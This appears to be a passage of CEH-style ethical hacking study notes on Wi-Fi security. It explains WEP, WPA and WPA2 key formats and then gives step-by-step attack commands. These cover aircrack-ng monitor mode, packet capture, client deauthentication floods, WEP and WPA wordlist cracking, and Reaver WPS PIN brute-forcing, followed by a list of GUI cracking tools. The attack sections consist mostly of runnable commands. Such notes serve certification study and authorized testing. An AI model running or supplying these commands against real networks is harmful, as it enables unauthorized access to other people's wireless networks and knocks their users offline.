Wi-Fi Hacking
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
1. WEP / WPA / WPA-2
WEP - Wired Equivalent Privacy
WEP keys are a sequence of hexadecimal digits.
These digits include the numbers 0-9 and the letters A-F.
Some examples of WEP keys are:
1A648C9FE2
99D767BAC38EA23B0C0176D152
The length of a WEP key depends on the type of WEP security (called "encryption")
utilized:
40- or 64-bit WEP: 10 digit key
104- or 128-bit WEP: 26 digit key
256-bit WEP: 58 digit key
WPA-PSK - Wi-Fi Protected Access (Pre-Shared Key) security key
The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-
bit keys used in the WEP system.
Temporal Key Integrity Protocol - TKIP
TKIP employs a per-packet key system that was radically more secure than fixed
key used in the WEP system.
KIP was later superseded by Advanced Encryption Standard (AES).
WPA2 - Wi-Fi Protected Access II
256-bit encryption
using a security key of either 64 hexadecimal digits or a passphrase of up to 63
ASCII characters.
2. Command Line
airmon-ng -> To Put Your Network adapter in monitor mode.
airodump -ng -> Start monitoring and packets sniffing.
aireplay -ng -> For Deauthanticate the user.
aircrack -ng -> To crack the key.
131. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
SSID - service set identifier (Name of Network)
BSSID - Base Station service set identifier -> BSSIDs Identify Access Points and Their Clients
(AP MAC Address)
Hacking WEP From Backtrack Linux Terminal
step1 : airmon-ng start wlan0
step2 : airodump-ng mon0
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0 --> Wait for at least 5000
packet
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
For Kali Linux : aireplay-ng -c <STATION or Client> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --
ignore-negative-one
step5 : aircrack-ng lab.cap
Hacking WPA & WPA2 From Backtrack Linux Terminal
step1 : airmon-ng start wlan0
step2 : airodump-ng mon0
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
> wait for at least 1 4-way handshake
> > For Kali Linux : aireplay-ng -c <STATION or client> -0 500 -a 0C:D2:B5:01:AB:70
mon0 --ignore-negative-one
step5 : aircrack-ng -w wordlist lab.cap
132. December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
Hacking WPS From Backtrack Linux Terminal
Reaver : [ crack wep-wpa-wpa2 ]
wash -i mon0
[ to se if WPS key is enable or not ( it should be enable) ] means [" wps locked option -- no "]
reaver -i mon0 -b <BSSID> -S --no-nacks -d7 -vv -c 1
NOTE : If u already have pin :
reaver -i mon0(or airoscript if you use fakeMAC) -b (bssid) -vv -c (channel) -e (name of AP) -p
(wps pin)
Graphical Interface Tools For Wi-Fi Hacking
wifite
Gerix Wi-Fi Cracker
Fern Wi-Fi Cracker